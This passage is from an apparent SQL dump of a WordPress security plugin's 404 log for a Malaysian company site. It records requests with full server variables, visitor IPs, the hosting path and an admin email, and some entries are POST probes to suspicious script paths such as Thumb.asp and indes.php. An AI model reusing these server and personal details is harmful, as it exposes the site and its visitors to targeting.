http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"61.240.30.88\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"61.240.30.88\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/images/Thumb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/images/Thumb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaskL-ivEQeUaFKlM5aedgAAAIY\";s:12:\"REDIRECT_URL\";s:17:\"/images/Thumb.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/images/Thumb.asp\";s:10:\"SCRIPT_URL\";s:17:\"/images/Thumb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaskL-ivEQeUaFKlM5aedgAAAIY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497007.2931\";s:12:\"REQUEST_TIME\";s:10:\"1571497007\";}}','notice','2019-10-19 14:56:49','2019-10-19 14:56:47',35269784,37080144,'http://bintara.com.my//images/Thumb.asp',1,0,'61.240.30.88'),(28371,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//images/Thumb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.114.141.73\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.114.141.73\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/images/Thumb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/images/Thumb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaskKPivEQeUaFKlM5aedAAAAJQ\";s:12:\"REDIRECT_URL\";s:17:\"/images/Thumb.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/images/Thumb.asp\";s:10:\"SCRIPT_URL\";s:17:\"/images/Thumb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaskKPivEQeUaFKlM5aedAAAAJQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497000.6663\";s:12:\"REQUEST_TIME\";s:10:\"1571497000\";}}','notice','2019-10-19 14:56:44','2019-10-19 14:56:41',35729776,37529840,'http://bintara.com.my//images/Thumb.asp',1,0,'220.114.141.73'),(28370,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/wp-includes/indes.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/wp-includes/indes.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:22:\"/wp-includes/indes.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xase5-BciE@oGFkw1scfswAAARg\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/wp-includes/indes.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/wp-includes/indes.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xase5-BciE@oGFkw1scfswAAARg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"48734\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/wp-includes/indes.php\";s:10:\"SCRIPT_URL\";s:22:\"/wp-includes/indes.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xase5-BciE@oGFkw1scfswAAARg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571495655.5687\";s:12:\"REQUEST_TIME\";s:10:\"1571495655\";}}','notice','2019-10-19 14:34:18','2019-10-19 14:34:15',35359520,37163080,'https://bintara.com.my/wp-includes/indes.php',1,0,'193.106.30.99'),(28369,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:42:\"https://bintara.com.my/our-history/about1/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasZDQYF48xX3r6hM@lzWgAAABI\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"79.185.221.140\";s:11:\"REMOTE_PORT\";s:5:\"56784\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XasZDQYF48xX3r6hM@lzWgAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571494157.3211\";s:12:\"REQUEST_TIME\";s:10:\"1571494157\";}}','notice','2019-10-19 14:09:20','2019-10-19 14:09:17',34966128,36784816,'https://bintara.com.my/our-history/about1/',1,0,'79.185.221.140'),(28368,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"59410\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XasY3QZfHioVGWbjloEDmgAAAMg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571494110.07\";s:12:\"REQUEST_TIME\";s:10:\"1571494110\";}}','notice','2019-10-19 14:08:33','2019-10-19 14:08:30',35411360,37229344,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(28367,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/google1276f568452cb071.html\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:54:\"Mozilla/5.0 (compatible; Google-Site-Verification/1.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/google1276f568452cb071.html\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/google1276f568452cb071.html\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasQv4Sv37jYkcNzit2XQgAAAAc\";s:12:\"REDIRECT_URL\";s:28:\"/google1276f568452cb071.html\";s:11:\"REMOTE_ADDR\";s:13:\"66.249.90.188\";s:11:\"REMOTE_PORT\";s:5:\"51562\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/google1276f568452cb071.html\";s:10:\"SCRIPT_URL\";s:28:\"/google1276f568452cb071.html\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XasQv4Sv37jYkcNzit2XQgAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571492032.0922\";s:12:\"REQUEST_TIME\";s:10:\"1571492032\";}}','notice','2019-10-19 13:33:53','2019-10-19 13:33:52',33757528,35562968,'https://bintara.com.my/google1276f568452cb071.html',1,0,'66.249.90.188'),(28366,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/%23Contact\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"winHttp 23076434\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/#Contact\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/#Contact\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasIioSv37jYkcNzit2OTQAAAAw\";s:12:\"REDIRECT_URL\";s:9:\"/#Contact\";s:11:\"REMOTE_ADDR\";s:13:\"61.239.49.117\";s:11:\"REMOTE_PORT\";s:5:\"29319\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/#Contact\";s:10:\"SCRIPT_URL\";s:9:\"/#Contact\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XasIioSv37jYkcNzit2OTQAAAAw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571489930.3501\";s:12:\"REQUEST_TIME\";s:10:\"1571489930\";}}','notice','2019-10-19 12:58:52','2019-10-19 12:58:50',34962496,36756456,'https://bintara.com.my/%23Contact',1,0,'61.239.49.117'),(28365,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/%23Careers\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"winHttp 23072587\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/#Careers\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/#Careers\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasIe4Sv37jYkcNzit2ORAAAAAc\";s:12:\"REDIRECT_URL\";s:9:\"/#Careers\";s:11:\"REMOTE_ADDR\";s:13:\"61.239.49.117\";s:11:\"REMOTE_PORT\";s:5:\"25518\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/#Careers\";s:10:\"SCRIPT_URL\";s:9:\"/#Careers\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XasIe4Sv37jYkcNzit2ORAAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571489915.3756\";s:12:\"REQUEST_TIME\";s:10:\"1571489915\";}}','notice','2019-10-19 12:58:37','2019-10-19 12:58:35',34962496,36756456,'https://bintara.com.my/%23Careers',1,0,'61.239.49.117'),(28363,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/%23Products\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"winHttp 23064730\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/#Products\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/#Products\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasIXbdRi@RFkkQCXDBErQAAAEQ\";s:12:\"REDIRECT_URL\";s:10:\"/#Products\";s:11:\"REMOTE_ADDR\";s:13:\"61.239.49.117\";s:11:\"REMOTE_PORT\";s:5:\"17279\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"https://bintara.com.my/#Products\";s:10:\"SCRIPT_URL\";s:10:\"/#Products\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XasIXbdRi@RFkkQCXDBErQAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571489885.7786\";s:12:\"REQUEST_TIME\";s:10:\"1571489885\";}}','notice','2019-10-19 12:58:08','2019-10-19 12:58:06',34961976,36763808,'https://bintara.com.my/%23Products',1,0,'61.239.49.117'),(28364,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/%23News\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"winHttp 23068734\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/#News\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/#News\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasIbLdRi@RFkkQCXDBEtwAAAEs\";s:12:\"REDIRECT_URL\";s:6:\"/#News\";s:11:\"REMOTE_ADDR\";s:13:\"61.239.49.117\";s:11:\"REMOTE_PORT\";s:5:\"21483\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/#News\";s:10:\"SCRIPT_URL\";s:6:\"/#News\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XasIbLdRi@RFkkQCXDBEtwAAAEs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571489900.3713\";s:12:\"REQUEST_TIME\";s:10:\"1571489900\";}}','notice','2019-